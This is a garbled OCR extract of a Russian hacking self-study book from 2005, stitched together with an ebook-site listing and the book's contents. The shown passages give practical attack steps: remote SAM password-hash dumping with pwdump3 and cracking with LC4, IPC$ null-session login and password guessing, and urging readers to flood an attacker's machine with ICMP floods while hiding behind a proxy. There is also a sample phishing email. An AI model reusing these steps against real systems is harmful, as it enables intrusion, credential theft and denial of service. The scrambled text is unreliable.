Робин Кейр (Robin Keir), разработал и предоставил всем желающим возможность
загрузить на сайте http://www.foundstone.com бесплатную утилиту DDoSPing 2.0,
которая выполняет тестирование компьютера на предмет наличия в нем программы-зомби. Далее работу выявленного зомби можно заглушить, воспользовавшись
программой флудера UDP, описанного в разделе «Флудер UDP» выше.
На Рис. 9.11 представлен диалог программы DDosPing 2.0, содержащий все необходимые элементы для выполнения тестирования.
-Target IP address range Start IP address

|1.Q.Q.5|

End IP address

h.OO 5

Slop

-Transmission speed control-

-o-

Speed (pkts/sec)
I 181

I

Modem—>-Cable—>—T1 —>—LAN
-Infected Hosts-

Program started: Sun Febl613:50:48 2003
Waiting 6 seconds for final results…
Program stopped: Sun Feb1613:50:54 2003

— Status Current IP
Packets sent
Time elapsed
Zombies detected
ne /лс,

1.0.0.5

3
00:00:00
0

Save List
Configuration

Affp://i

Рис. 9.11. Диалог программы выявления зомби DDoS
позволяет тестировать целую сеть
Для работы с программой DDoSPing 2.0 следует выполнить такие шаги.
> В поля Start IP address (Начальный IP-адрес) и End IP-address (Конечный
ГР-адрес) введите начальный и конечный IP-адреса тестируемой сети или отдельного хоста.
157

Самоучитель хакера
>• Установите ползунок Speed (Скорость) в позицию, соответствующую тестируемой сети, в данном случае LAN.
>• Если необходимо, щелкните на кнопке Configuration (Конфигурация) и откройте диалог настройки программы Рис. 9.12).

В Enable

|

Send to UDP port

[34555

«Ping» command

|pngQ..KsH4

Expected reply

(PONG

Windows defaults
|

UNIX defaults

Listen on UDP port |355Б5

|

I
i

0 Enable
SendlCMPID

[668

«Ping» commend

Jgesundheit!

|

Expected reply

|sicken\n

P^ceivelCMPID [б69

|

I
I

0 Enable
SendlCMPID
«Ping» command

[?89

|

Receive ICMP ID [Ш

i

|

I

— ~ •»»»»
П Show UDP transmit errors
Max run duration (sees)

[O

Transmit each packet

1

After scon ends, wait

Cancel

I (Q«forev@r)
times

| OK

sees for final rep lies

Рис. 9.12. Настройка программы тестирования
> В зависимости от тестируемой системы, щелкните на кнопке Windows defaults
(Windows по умолчанию) или Unix defaults (Unix по умолчанию), чтобы установить стандартные параметры проверки систем Windows или Unix, соответственно.
>• Обратите внимание, что программа DDoSPing 2.0 позволяет выявлять зомби, принимающие участие не только в атаках WinTrinoo, но и других, не
менее интересных атаках того же рода — StachelDraht и Tribe Flood Network. Если настройки программы вас устраивают, щелкните на кнопке ОК
в диалоге настройки программы (Рис. 9.12).
> В диалоге DDoSPing 2.0 на Рис. 9.11 щелкните на кнопке Start (Пуск) и выполните тестирование. Ход проверки отображается в поле Infected Hosts (Зараженные хосты).
Другой, не менее популярной утилитой для выявления компьютеров-зомби
является программа Zombie Zapper (http://razor.bindview.com/tools/
ZombieZapper__form.shtml), которая как раз и является творцом атаки WinTrinoo.
На Рис. 9.13 представлен диалог этой программы, который, как видим, не очень
отличается от DDoSPing 2.O.
158

Атаки DoS

Target(s)

0 Specify single IP or class С subnet

—|

Target IP:
| input IMs…

0 Trinoo

UDP source

|53

0 Trinoo for Windows
0TFN
0 Sta.chelDroht
QShatt-myfloodedhost:

|

[ T o I Repeats (1-300)

Zap

Exit

Puc. 9.13. Программа Zombie Zapper также неплоха
Однако в отличие от DDoSPing 2.0, программа Zombie Zapper не позволяет выполнять настройку тестирования хостов и не снабжена такими удобными средствами наблюдения за ходом проверки, как DDoSPing 2.O.

Заключение
Как вы, наверное, уже поняли, атаки DoS — это занятие не для Хакеров с большой буквы, а скорее для типов, наподобие упомянутого в Главе 1 доктора Добрянского. В самом деле, что толку оттого, что где-то за океаном, за тридевять
земель, у кого-то перестанет работать Web-сервер и этот кто-то понесет потери.
Вам-то что с того, если только, надеюсь, вы не кибертеррорист и не личность с
«обугленным черепом и клочками растительности, и обрывками проводов», как
у доктора Добрянского. Но вот для Антихакера атаки DoS иногда могут стать
просто спасением, если попытки остановить атаки какого-нибудь «кул хацкЁра»
(да-да, именно «Ё», уже и такие появились) не получаются никаким образом и нет
уже сил и средств на непрерывное наращивание мощностей Web-сервера. Выявите
IP-адрес такого «хацкЁра» и затопите его компьютер пакетами ICMP-флудера!
Системы EDS всегда готовы предоставить DP-адрес, требуемый для такой контратаки, а простые флудеры, подобные описанным в этой главе, можно найти на
многих сайтах Web. Однако помните, что такие методы защиты — на грани допустимого, и их использование чревато. Поэтому антихакер должен применять
обоюдоострое оружие атак DoS весьма умело, действуя через прокси-сервер и
прикрываясь брандмауэром — а то ведь и ответить могут!
159

Г Л А В А 10.

Хэкииг компьютеров Windows ZOOO/Xf
Итак, хакеру удалось подсоединиться к локальной сети, воспользовавшись каким-то заброшенным (чужим) компьютером, или нелегально подсоединиться к
сетевому кабелю, проходящему где-то в подвале, применив специальное устройство (подробнее о таких приспособлениях вы можете прочитать, например, в [1]).
Впрочем, все это, как правило, излишне — при царящем в нынешних локальных
сетях хаосе достаточно получить доступ к обычному сетевому компьютеру — и
далее все зависит от вас. Итак, хакер получил доступ к локальной сети и теперь
хочет получить доступ к информационным ресурсам сетевых хостов. Как же он
может это сделать?
Далее работа утилит хакинга иллюстрируется на примере нашей
экспериментальной сети TCP/IP, которую мы использовали на протяжении всей книги. Эта сеть позволит продемонстрировать набор технических приемов хакинга сетей TCP/IP без нарушения чьихлибо прав на конфиденциальность информации. Автор категорически настаивает на неприменении описанных далее средств к реальным сетям и предупреждает о возможной ответственности.
В Главе 1 мы описали все этапы хакерского нападения и указывали, что хакер
вначале попытается узнать все что только можно об организации атакуемой сети
и применяемых в ней сетевых технологиях. В этой главе мы опустим этап предварительного сбора данных — он достаточно подробно описан, например, в [11].
Вместо этого мы поподробнее рассмотрим все последующие этапы сетевой атаки, которые, собственно, и делают хакинг таким «интересным» занятием. Как
указывалось в Главе 1, первое, что должен сделать хакер для проникновения в
сеть — это выполнить ее сканирование и инвентаризацию.

Сканирование cemu*TCf/lf
Сканирование преследует цель определение IP-адресов хостов атакуемой сети, и
для выполнения сканирования можно воспользоваться утилитой ping из набора
средств, представленных в пакете W2RK (Windows 2000 Resource Pack).
Эта утилита посылает сетевым хостам с ГР-адресами в заданном диапазоне пакеты протокола ICMP (Internet Control Message Protocol — Протокол управляющих
сообщений в сети Интернет). Если в ответ на посланный пакет приходит ответ значит по соответствующему адресу находится сетевой хост. На Рис. 10.1 представлен результат сканирования утилитой ping хоста Sword-2000.

Хакинг компьютеров Windows 2000/XP
с \ Command Prompt

Pinging 1.Q.O.I with 32 bytes of data:
Reply
Reply
Reply
Reply

fron
fron
fron
fron

1.0.0.1:
1.0.0.1:
1.0.0.1:
1.0.0.1:

bytes=32
bytes=32
bytes=32
bytes=32

tinenbtst

Sviord:
Node Ipflddress: 11.Ш.0.5] Scope Id: I I
NetBIOS Remote Machine Nane Table

SUORD-20QQ
SUORD-2Q00
SUORD
SUORD
SUORD
SUORD
SWORD-20QGI
SUORD
MSBROUSE_
INef»Seruices
IS-SUORD-2000.
flDMINISlllfllOR

Registered
Registered
Registered
Registered
Registered
Registered
Registere
Registerei
Registered
Registered
52-54-flB-14-S5-B4

Puc. 10.4. Общие ресурсы компьютера Sword-2000
Как видим, учетная запись пользователя Administrator открывает общий сетевой
доступ к некоторым папкам файловой системе компьютера Sword-2000 и дисководу CD-ROM. Таким образом, мы уже знаем о компьютере достаточно много — он
разрешает нулевые сеансы NetBIOS, на нем работает пользователь Administrator,
открыты порты 7, 9, 13, 17, 139, 443, 1025, 1027 компьютера, и в число общесетевых ресурсов входят отдельные папки локального диска С:. Теперь осталось
только узнать пароль доступа пользователя Administrator — и в нашем распоряжении будет вся информация на жестком диске С: компьютера. Чуть ниже мы

164

Хакинг компьютеров Windows 2000/XP
покажем, как для этого используется утилита pwdump3.exe удаленного извлечения паролей из системного реестра Windows NT/2000/XP и программа LC4 их
дешифрования.
А что можно сделать, если протокол NetBIOS через TCP/IP будет отключен
(компьютеры Windows 2000/XP предоставляют такую возможность)? Существуют и другие средства инвентаризации, например, протокол SNMP (Simple
Network Management Protocol — Простой протокол сетевого управления), обеспечивающий мониторинг сетей Windows NT/2000/XP. Атаки, основанные на уязвимостях SNMP, описаны, например, в [11].
А сейчас, после того, как мы собрали сведения об атакуемой системе, перейдем
к ее взлому.

Реализация цели
Исполнение атаки на системы Windows NT/2000/XP состоит из следующих этапов.
• Проникновение в систему, заключающееся в получении доступа.
• Расширение прав доступа, состоящее во взломе паролей учетных записей с
большими правами, например, администратора системы.
• Выполнение цели атаки — извлечение данных, разрушение информации и т.д.

Проникновение Ъ систему
Проникновение в систему начинается с использования учетной записи, выявленной на предыдущем этапе инвентаризации. Для определения нужной учетной записи хакер мог воспользоваться командой nbtstat или браузером MIB,
или какими-либо хакерскими утилитами, в изобилии представленными в Интернете (см. целый перечень в [3] или в [4]). Выявив учетную запись, хакер может
попробовать подсоединится к атакуемому компьютеру, используя ее для входной аутентификации. Он может сделать это из командной строки, введя такую
команду.
D:\>net use \\1.0.0.1\1РС$ * /u:Administrator
Символ «*» в строке команды указывает, что для подключения к удаленному
ресурсу IPC$ нужно ввести пароль для учетной записи Administrator. В ответ на
ввод команды отобразится сообщение:
Type password for \\1.0.0.1\IPC$:
Ввод корректного пароля приводит к установлению авторизованного подключения. Таким образом, мы получаем инструмент для подбора паролей входа в
компьютер — генерируя случайные комбинации символов или перебирая содер165

Самоучитель хакера
жимое словарей, можно, в конце концов, натолкнуться на нужное сочетание
символов пароля. Для упрощения подбора существуют утилиты, которые автоматически делают все эти операции, например, SMBGrind, входящая в коммерческий пакет CyberCop Scanner компании Network Associates. Еще один метод создание пакетного файла с циклическим перебором паролей (пример такого
файла можно найти в [3]).
Однако удаленный подбор паролей — далеко не самое мощное орудие взлома.
Все современные серверы, как правило, снабжены защитой от многократных попыток входа со сменой пароля, интерпретируя их как атаку на сервер. Для взлома
системы защиты Windows NT/2000/XP чаще используется более мощное средство, состоящее в извлечении паролей базы данных SAM (Security Account Manager — Диспетчер учетных данных системы защиты). База данных SAM содержит
шифрованные (или, как говорят, хешированные) коды паролей учетных записей,
и они могут быть извлечены, в том числе удаленно, с помощью специальных
утилит. Далее эти пароли дешифруются с помощью утилиты дешифрования,
использующей какой-либо метод взлома, например, «грубой силой», либо словарной атакой, путем перебора слов из словаря.
Наиболее известной утилитой дешифрования, применяемой для взлома паролей
SAM, является программа LC4 (сокращение от названия LOphtcrack, новейшая
версия — LC4) (http://www.atstake.com/research/redirect.html), которая действует в паре с такими утилитами.
• Samdump — извлечение хешированных паролей из базы данных SAM.
• Pwdump — извлечение хешированных паролей из системного реестра компьютера, включая удаленные системы. Эта утилита не поддерживает усиленное шифрование Syskey базы SAM (подробнее о Syskey см. Главу 2).
• Pwdump2 — извлечение хешированных паролей из системного реестра, в котором применено шифрование Syskey. Эта утилита поддерживает работу
только с локальными системами.
• Pwdump3 — то же, что и Pwdump2, но с поддержкой удаленных систем.
Что такое шифрование Syskey, мы подробно обсудили в Главе 2; здесь укажем,
что это средство усиленного шифрования базы SAM, которое устанавливается в
системах Windows 2000/XP по умолчанию, а для систем Windows NT должно
быть установлено как дополнительная возможность.
В Главе 2 было описано, как следует извлекать пароли из локального системного реестра, сейчас же рассмотрим, как эта операция выполняется удаленно.
Для извлечения хешированных паролей из компьютера Sword-2000 применим
утилиту PwdimpS, запустив ее из командной строки:
C:\>pwdump3 sword-2000 > password.psw

166

Хакинг компьютеров Windows 2000/XP
Здесь в командной строке указан целевой компьютер Sword-2000, а далее задано
перенаправление вывода извлеченных данных в файл с именем password.psw.
Содержимое полученного в результате файла представлено в окне приложения
Блокнот (Notepad) (Рис. 10.5).
sword.psw — Notepad
File

Edit

Format

Help

\dministator: SOO:7A01665EB2£B6C14AAD3B435B51404EE:OB0412D8761239A73143EFAE928E9FO
A:::
Guest:501 :NO PASSWORD*»‘
:NO PASSWORD
*
:::
krbtgt:S02:NO PASSWORD

:7BD70B6AF1C3909E006426SFE207B256:::
Alex:1110:7A01665EB2EB6C14MD3B43SB51404EE:OB0412D8761239A73143EFAE92eE9FOA;::
Alex-1:1113:7A01665EB2EB6C1•?•

SSI
os-

о 6

S 3

i!
t.

E-mail: opt@triumph.ru

  • Главная
  • Аудиокниги
  • Книги
  • Журналы

Лучшее в категории — Книги / Компьютерная литература

Кровь, пот и пиксели. Обратная сторона индустрии видеоигр (2018, Джейсон Шрейер)
Рейтинг: 10 из 10
MS Excel в расчетных задачах (2010, Т.Р. Косовцева)
Рейтинг: 10 из 10
Искусство дизассемблирования. Наиболее полное руководство (2008, Крис Касперски)
Рейтинг: 9,9 из 10
Простой Python. Современный стиль программирования (2016, Билл Любанович)
Рейтинг: 9,8 из 10
Java 7 (2012, Ильдар Хабибуллин)
Рейтинг: 9,8 из 10
Android для разработчиков. 3-е издание (2016, Пол Дейтел)
Рейтинг: 9,8 из 10
Программирование. Принципы и практика с использованием C++. 2-е издание (2016, Бьярне Страуструп)
Рейтинг: 9,8 из 10
Сборник книг Кевин Митник (2004)
Рейтинг: 9,6 из 10

22
фев
2010

Самоучитель хакера: подробное иллюстрированное руководство

ISBN: 5-93673-036-0
Формат: PDF, OCR без ошибок
Год выпуска: 2005
Жанр: Самоучитель
Издательство: Лучшие книги
Язык: Русский
Количество страниц: 192
Описание: Что нового привносит в общий поток хакерской литературы эта не-
большая книга? А то, что в ней вся необъятная тема хакинга рассмотрена в
единственном, но самом важном аспекте — практическом.

25
ноя
2010

JavaScript. Подробное руководство (2008)

Пятое издание бестселлера «JavaScript. Подробное руководство» полностью обновлено. Рассматриваются взаимодействие с протоколом HTTP и применение технологии Ajax, обработка XML-документов, создание графики на стороне клиента с помощью тега canvas , пространства имен в JavaScript, необходимые для разработки сложных программ, классы, замыкан …

ISBN: 5-93286-103-7
Формат: PDF, Отсканированные страницы
Год выпуска: 2008
Жанр: Программирование
Издательство: Символ-Плюс
Язык: Русский
Количество страниц: 984

23
янв
2015

Инструментарий хакера (2014, Сергей Бабин)

Оригинальное изложение материала позволит читателю понять методы обеспечения защиты информации, как на личных компьютерах, так и в профессиональных системах. Описаны основные принципы подбора инструментария хакера. Приведено множество примеров взлома и сокрытия следов: перехват паролей, атаки на Wi-Fi-роутеры, подмена MAC-адресов, способы …

ISBN: 978-5-9775-3314-0
Формат: PDF, EBook (изначально компьютерное)
Автор: Сергей Бабин
Год выпуска: 2014
Жанр: Компьютерная литература, программирование
Издательство: БХВ-Петербург
Серия: Глазами хакера
Язык: Русский
Количество страниц: 240

10
фев
2010

Программирование в Delphi глазами хакера (2003)

ГЛАВА 1. МИНИМИЗАЦИЯ И НЕВИДИМОСТЬ ГЛАВА 2. ПРОСТЫЕ ШУТКИ ГЛАВА 3. СИСТЕМА ГЛАВА 4. ПРОСТЫЕ ПРИЕМЫ РАБОТЫ С СЕТЬЮ ГЛАВА 5. СЕТЬ НА НИЗКОМ УРОВНЕ ГЛАВА 6. ЖЕЛЕЗНАЯ МАСТЕРСКАЯ ГЛАВА 7. ПОЛЕЗНОЕ

ISBN: 5-94157-351-0
Формат: PDF, EBook (изначально компьютерное)
Год выпуска: 2003
Жанр: Програмирование
Издательство: БХВ-Петербург
Язык: Русский
Количество страниц: 368

28
дек
2007

Максим Левин. Библия хакера 2 (2003)

Максим Левин, бывший хакер, «обрисовывает» в своей книге все необходимые стадии взлома и «замыкает» всю информацию воедино для создания эффективных мер по обеспечению безопасности компьютерной сети. В книге весьма подробно описаны применяемые хакерами программы и инструменты, стратегии взлома, методы создания надежной и эффективной защиты …

Качество: EBook (изначально компьютерное)
Формат: PDF
Автор: Максим Левин
Жанр: Компьютерная безопасность
Издательство: Майор
Страна: Россия
Год выпуска: 2003
Количество страниц: 638 — 688

16
июн
2014

Компьютер глазами хакера. 3-е издание (2012, Михаил Фленов)

Рассмотрены компьютер, операционные системы Windows XP/Vista/7 и Интернет с точки зрения организации безопасной и эффективной работы на ПК. Описаны основные методы атак хакеров и рекомендации, которые позволят сделать компьютер быстрее, надежнее и безопаснее. Представлены примеры накручивания счетчиков на интернет-сайтах и методы взлома п …

ISBN: 978-5-9775-0790-5
Формат: PDF, EBook (изначально компьютерное)
Автор: Михаил Фленов
Год выпуска: 2012
Жанр: Компьютерная литература
Издательство: БХВ-Петербург
Язык: Русский
Количество страниц: 272

24
авг
2014

Самоучитель Office 2013

В состав пакета Microsoft Office 2013 входит множество программ для выполнения самых разных задач. В этой книге вы найдете сразу три самоучителя по самым популярным приложениям Office: текстовому процессору Word, редактору электронных таблиц Excel и программе для создания презентаций PowerPoint. В книге описаны все основные приемы, исполь …

ISBN: 978-5-699-62713-4
Формат: PDF, DjVu, Отсканированные страницы
Автор: Владимир Пташинский
Год выпуска: 2013
Жанр: Компьютерная литература
Издательство: Эксмо
Серия: Компьютер на 100%
Язык: Русский
Количество страниц: 288

19
дек
2013

Самоучитель Windows 7 (2010, Сергей Вавилов)

Если вы только что купили новый компьютер и пока не знакомы с понятием операционной системы, знайте: «операционка» — это то, без чего компьютер становится бесполезной грудой проводов, железок и микросхем. Эта книга поможет вам быстро и легко изучить Windows 7 — новую версию самой популярной в мире операционной системы. Вы узнаете, что так …

ISBN: 978-5-49807-500-6
Формат: PDF, EBook (изначально компьютерное)
Автор: Сергей Вавилов
Год выпуска: 2010
Жанр: Компьютерная литература
Издательство: Питер
Язык: Русский
Количество страниц: 272/234

30
мая
2008

100% самоучитель Linux (2006, Дж. Валади)

Если вы решили попробовать свои силы в загадочной системе Linux — то эта книга для вас. Автор — эксперт по Linux — постарался сделать так, чтобы вы освоили Linux, не останавливаясь на мелочах. Изложение ведется на основе небольших, тщательно подобранных примеров, сопровождающих все обсуждаемые темы — все очень быстро, наглядно и эффективн …

Автор: Дж. Валади
Издательство: Технолоджи — 3000
Год выпуска: 2006
Количество страниц: 336

20
янв
2015

Самоучитель С#. Начала программирования (2013, Э.А. Ишкова)

Данная книга является превосходным и эффективным учебным пособием для изучения языка программирования С# с нуля. Правила и приемы С# иллюстрируются программами-примерами, часть которых имеет прикладной характер. Все программы снабжены результатами исполнения. Показан вариант организации рабочего пространства в компьютере и создания просте …

ISBN: 978-5-94387-927-2, Самоучитель
Формат: PDF, Отсканированные страницы
Автор: Э.А. Ишкова
Год выпуска: 2013
Жанр: Учебное пособие, программирование
Издательство: Наука и Техника
Язык: Русский
Количество страниц: 496

04
окт
2013

Понятный самоучитель Excel 2013

Эта книга научит вас работать в Microsoft Excel — одной из самых популярных и востребованных офисных программ. Книга написана простым, доступным языком, снабжена практическими примерами и заданиями для самостоятельного освоения материала и предназначена для самого широкого круга пользователей. В издании рассмотрен интерфейс последней верс …

ISBN: 978-5-496-00786-3
Формат: PDF, OCR без ошибок
Автор: Алексей Лебедев
Год выпуска: 2013
Жанр: Компьютерная литература
Издательство: Питер
Язык: Русский
Количество страниц: 128

10
ноя
2013

Photoshop CS6. Понятный самоучитель (2013, Владислав Дунаев)

С помощью этой книги вы сможете быстро овладеть основными приемами работы в новейшей версии популярной графической программы Adobe Photoshop CS6. Вы освоите ее главные и самые нужные функции и научитесь применять полученные знания на практике. После изучения этой книги вы без труда сможете выполнять массу простых операций — от создания и …

ISBN: 978-5-459-01691-8
Формат: PDF, EBook (изначально компьютерное)
Автор: Владислав Дунаев
Год выпуска: 2013
Жанр: Компьютерная литература
Издательство: Питер
Язык: Русский
Количество страниц: 208

15
мая
2011

Понятный самоучитель Excel 2010

Microsoft Excel — одна из самых загадочных и интересных программ в пакете MS Office 2010. Интересна она многочисленными средствами автоматизации работы, оформления документов и богатыми вычислительными возможностями. Загадочность ее состоит в том, что большинство пользователей применяют лишь малую толику того, что может дать им Excel. Это …

ISBN: ISBN 978-5-49807-771-0
Формат: PDF, Отсканированные страницы
Автор: В. Волков
Год выпуска: 2010
Жанр: Компьютерная литература
Издательство: Питер
Язык: Русский
Количество страниц: 252

06
авг
2014

Самоучитель Microsoft Windows 8 (2013, Денис Колисниченко)

Описаны основные нововведения в Windows 8, особое внимание уделено использованию системы на планшете. Рассмотрена установка системы как на физический компьютер (стационарный, ноутбук, нетбук, планшет), так и на виртуальный (VMware, Virtual Box). Приведено описание нового интерфейса системы Metro, стандартных Metro-приложений, новой версии …

ISBN: 978-5-9775-0903-9
Формат: PDF, EBook (изначально компьютерное)
Автор: Денис Колисниченко
Год выпуска: 2013
Жанр: Компьютерная литература
Издательство: БХВ-Петербург
Серия: Самоучитель
Язык: Русский
Количество страниц: 288

Самоучитель

хакера

ПОДРОБНОЕ
ИЛЛЮСТРИРОВАННОЕ

РУКОВОПСТВО

Alex Atsctoy

Самоучитель
ХАКЕРА
Подробное иллюстрированное руководство

«Лучшие книги»
Москва

УДК 004.056.53(075.8)
ББК 32.973.202-08я78-1+32.973.2б-018.2я78-1
АЗЗ

Alex Atsctoy.
АЗЗ Самоучитель хакера : подроб. иллюстрир. рук.: [учеб, пособие] /
Alex Atsctoy. — М.: Лучшие книги, 2005. — 192 с.: ил. —
ISBN 5-93673-036-0.
Агентство CIP РГБ

Что нового привносит в общий поток хакерской литературы эта небольшая книга? А то, что в ней вся необъятная тема хакинга рассмотрена в
единственном, но самом важном аспекте — практическом.

Посетите наш Интернет-магазин
®
«Три ступеньки »: www.3st.ru
E-mail: post@triumph.ru

ISBN 5-93673-036-0

© ООО «Лучшие книги», 2005
© Обложка ООО «Лучшие книги», 2005
© Верстка и оформление ООО «Лучшие книги», 2005

Краткое содержание
Глава 1. ХакиИГ

8

Глава 2. Зашита Windows ZOOO/Xf.

25

Глава з. «Проникновение Ъ систему

37

Глава4. Сокрытиеследод

57

Глава5. Хзкинг fyay^epofc Web

73

Глава 6. Деструкция почтового клиента

83

Глава 7. XaKUHflCQ

99

Глава 8. Хакинг Web~caumo&

115

Глава9. AmaKU’PoS

143

Глава ю. Хакингкомпьютеров
Windows 2000/Xf

160

Глава 11. Хакииг коммутируемого доступа

176

Список литературы

191

Содержание
Глава 1.Хзки«Г …………………………………………………………………………………. 8
Хакеры и антихакеры ……………………………………….. . ………………………………………….. 9
Что это такое — хакинг? ……………………………………………………………………………………… 10
Как хакеры все это делают ………………………………………………………………………………….. 13
Инструменты хакинга …………………………………………………………………………………… 16
Социальная инженерия …………………………………………………………………………………………. 16
Предварительный сбор информации ……………………………………………………………………… 17
Взломщики паролей доступа к файлам ………………………………………………………………….. 75
Атака клиентов Web …………………………………………………………………………………………….. 19
Атака серверов Web ……………………………………………………………………………………………… 20
Сетевые сканеры …………………………………………………………………………………………………. 21
Перехват сетевого трафика ………………………………………………………………………………… 21
Встроенные средства операционной системы ………………………………………………………. 22
Программы-экстойты …………………………………………………………………………………………. 22
Вирусы и трояны ………………………………………………………………………………………………….. 23
Заключение ………………………………………………………………………………………………….. 23

Глава 2. 23Ш1ШЗ WmdOMS 2OOO/XP. ………………………………………. 25
Аутентификация ………………………………………………………………………………………….. 25
Авторизация ………………………………………………………………………………………………… 26
Аудит …………………………………………………………………………………………………………… 27
Как работает защита Windows 2000/XP …………………………………………………………. 28
База SAM ……………………………………………………………………………………………………………… 29
Объекты системы защиты ………………………………………………………………………………….. 30
Активный каталог ……………………………………………………………………………………………….. 31
Регистрация в домене Windows 2000 …………………………………………………………………….. 33
Антихакинг ………………………………………………………………………………………………….. 35
Заключение ………………………………………………………………………………………………….. 36

Главаз.Проиикио&еииеЪсистему………………………………………….з?
Загрузка со съемного носителя ……………………………………………………………………… 38
Утилита NTFSDOS Pro ………………………………………………………………………………………… 39
Взлом базы SAM …………………………………………………………………………………………………… 44
Взлом доступа к файлам и папкам ………………………………………………………………………… 47
Пароли за строкой ******** ………………………………………………………………………………… 50
Создание потайных ходов …………………………………………………………………………….. 51
Добавление учетных записей ………………………………………………………………………………… 52
Автозагрузка утилит …………………………………………………………………………………………… 53
Клавиатурные шпионы …………………………………………………………………………………………. 53
Заключение
……………………………………………………………………………………
.. 56

Содержание

Глава 4. Сокрытие следов

57

Два аспекта задачи сокрытия следов
Локальная безопасность
Глобальная безопасность
Прокси-серверы
Сокрытие следов атаки
Отключение аудита
Очистка журналов безопасности
Заключение

58
59
63
66
68
69
70
72

Глава 5. Хзкииг £раузеро& Web
Злонамеренный код HTML
Подмена Web-сайтов
Методы социальной инженерии
Заключение

73
74
78
81
82

Глава 6. Деструкция почтового клиента

83

Мейлбомберы
Снаряжение м ейлбомбера
Атака клонов
Ковровое бомбометание списками рассылки
Дополнительные вооружения мейлбомбера
Подбор паролей к почтовому ящику
Методы социальной инженерии
Заключение

83
85
88
89
90
91
96
97

Глава 7. ХакиИГ ICQ

99

Аськины угрозы
Экспериментальная интрасеть с сервисом ICQ
СпуфингиГК
Определение IP-адреса и порта ICQ-клиента
ICQ-флудеры
Взлом сервера ICQ
ICQ-крякеры
Методы социальной инженерии
Заключение

100
101
102
103
104
106
111
112
113

Самоучитель хакера

Глава 8. ХзКМНГ We|?~C3UmO&

115

Функционирование Web-сайта
Этапы хакинга Web-сайта
Исследование Web-сайта
Предварительный сбор данных
Сканирование и инвентаризация сервера
Взлом сервера IIS 5
ХакингНТТР
Уязвимые сценарии
Web-спайдер Teleport Pro
Мастер создания нового проекта
Настройка свойств проекта
Исследование кода HTML
Взлом доступа к страничкам Web
Заключение

115
116
118
119
120
122
123
125
131
132
136
138
139
142

Глава 9. Ahl3KU «РоЗ

143

Разновидности атак DoS
Атаки насыщением полосы пропускания
ФлудериОР
Флудер!8МР
Флудер Smurf.
Атаки на истощение ресурсов
Атаки некорректными сетевыми пакетами
Атаки Nuke
Атаки Teardrop
Атаки Ping of Death
Атаки Land
Атаки фальсифицированными сетевыми пакетами
Защита от атак DoS
Заключение

144
145
145
147
148
149
151
752
154
154
755
155
756
159

Глава 10. Хзкииг компьютеров Windows 2ООО/ХР.

ш

Сканирование сети TCP/IP
Инвентаризация сети
Нулевой сеанс.
Реализация цели
Проникновение в систему
6

160
162
762
165
765

Содержание
Расширение прав доступа и реализация атаки
Приложение NetBus
Сокрытие следов
Заключение

168
169
173
175

Глава п. Хзкиигкоммутируемого доступа

176

Источники номеров телефонов
Сканер PhoneSweep 4.4
Диалог PhoneSweep 4.4
Верхняя горизонтальная панель инструментов
Вертикальная панель инструментов
Значки в строке состояния
Работа с программой PhoneSweep
Правила прозвана
Заключение

177
178
179
180
782
185
186
186
190

Слисок литературы

ш

Г Л А В А 1.

Хзкииг
Допустим, вы — обычный человек, использующий компьютер на работе и дома
для решения тех задач, для которых он, собственно, и предназначен его создателями. В том числе, вы любите путешествовать по Интернету, а также переписываться со своими друзьями и знакомыми по электронной почте. И вот, в один
прекрасный день к вам приходит письмецо примерно такого содержания (пример взят из журнала «Хакер»).
Уважаемый пользователь!!!
К сожалению, на Вашем счету был обнаружен факт двойного доступа к нашему серверу, т.е. в одно и то же время, используя Ваш аккаунт, в систему вошли 2 (два) пользователя. Вследствие чего возникла необходимость в смене Вашего текущего пароля доступа к
нашей сети.
Вам необходимо ответить на это письмо, используя следующий
формат:
log: ваш логин
ор: ваш старый пароль
пр1: ваш новый пароль
пр2: ваш новый пароль
em: ваш e-mail
Эти сведения должны находиться в начале Вашего сообщения.
Обратите внимание на то, что новый пароль должен быть повторен
дважды! Это необходимо для точной идентификации Вашего аккаунта. Рекомендуется прислать свои сведения до 13.06.1999, т.к. по
истечении этого срока возможно отключение Вашего аккаунта.
Желаем Вам успехов!!!
С уважением,
администрация сервера http://www.super-internet-provider.ru
Ваши дальнейшие действия определят ваш статус в том увлекательном и многообразном мире, который называется уже примелькавшимися терминами «киберпространство» или «виртуальное пространство». Если вы аккуратно заполните
указанные позиции и отошлете письмо обратно, то вы — «ламер», или, того хуже, «лох», которого «напарили» проворные ребята, называющие себя «хакерами», «хацкерами», и даже «кул хацкерами». После этого знаменательного события вам, скорее всего, придется смириться с потерей некоей суммы денег,
которую вы заплатили своему провайдеру Интернета за возможность подсоединяться к серверу Интернета и рассматривать на экране компьютера всякие
разные Web-странички с интересными картинками.

Хакинг
Однако вас можно и поздравить с боевым крещением — вы впервые столкнулись
с тем, что называется «хакингом». Пусть вы и проиграли первую схватку — ничего, за одного битого двух небитых дают. У вас все еще впереди, и если вы не
сломитесь от первой неудачи, то, быть может, еще выйдете победителем в сражении, которое непрерывно ведется на просторах киберпространства почти с
самого момента его возникновения.
Это сражение ведется за обладание информацией — некой неощутимой и невесомой субстанцией, продуктом технического и научного прогресса человеческой
цивилизации, возникшем еще на самой заре ее возникновения. В этой великой
битве за информационные ресурсы во все времена и народы принимало и принимает участие две стороны — обладатель информации, и, скажем так, «претендент» на ее обладание. И чего только не было придумано за многие века, чтобы
получить доступ к информации и одновременно, защитить информацию от посягательств разного рода охотников за чужими секретами! Эта борьба велась не
на жизнь, а на смерть, с использованием любых способов и приемов, и ценой
победы подчас становились судьбы целых народов.
И вот были изобретены компьютеры, вначале громоздкие и маломощные, потом все более миниатюрные и высокопроизводительные. Последний шаг был
сделан совсем недавно буквально у всех на глазах — за считанные годы, начиная примерно с 80-х годов прошедшего века, на столе у многих людей по всему земному шару появились персональные компьютеры, и, что еще интереснее, появилась всемирная компьютерная сеть — Интернет, связывающая эти
компьютеры воедино.
И вот тут то все и началось.

Хакеры и антихакеры
Суть произошедших перемен заключается в том, что ныне вся деятельность, посвященная подготовке и хранению информации, или уже переместилась, или
активно перемещается на компьютеры. Люди постарше помнят заваленные бумагами канцелярии и всякие разные конторы, заставленные письменными столами, за которыми сидело множество людей, строчивших бумаги. Далее эти бумаги печатались на машинках (ну и шум там стоял!), подшивались в папки и
ложились на полки шкафов и стеллажей на радость тараканам и мышам.
А теперь посмотрим на современный офис — вместо счетов и ручных калькуляторов
(да-да, именно так это и было!) ныне на рабочих столах с современным дизайном
стоят персональные компьютеры, и множество сидящих за компьютерами людей
признаются, что уже просто отвыкли от использования ручек и карандашей.
На этих компьютерах делается все то, что называется обработкой информации,
под которой подразумевается практически все — от подготовки документации на

9

